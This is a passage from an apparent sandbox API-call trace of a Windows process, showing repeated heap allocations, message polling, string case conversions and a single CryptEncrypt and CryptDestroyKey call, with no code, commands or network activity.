wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0188.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0188.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.959] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.959] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.959] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.959] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.959] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.959] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.960] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0188.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.960] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34e9b20*, pdwDataLen=0x8bef68*=0x178b5, dwBufLen=0x178b8 | out: pbData=0x34e9b20*, pdwDataLen=0x8bef68*=0x178b8) returned 1 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0188.962] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0188.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.962] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.963] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.963] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.963] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.963] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.964] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.964] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.964] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.964] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.964] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.964] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.964] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.964] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.965] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.965] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.965] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.965] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.965] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.965] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.966] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.966] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.966] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.966] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.966] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.966] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.966] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.970] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.970] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.970] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.973] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0188.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.973] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.973] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0188.974] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.974] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0188.974] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.974] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.974] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.974] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.975] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.975] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.975] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.975] CryptDestroyKey (hKey=0xaa5860) returned 1 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.976] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.976] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.976] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.976] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.976] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.976] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.976] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0188.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.976] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.977] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.977] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.977] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.977] PeekMessageW (in: lpMsg=0x8beee8, 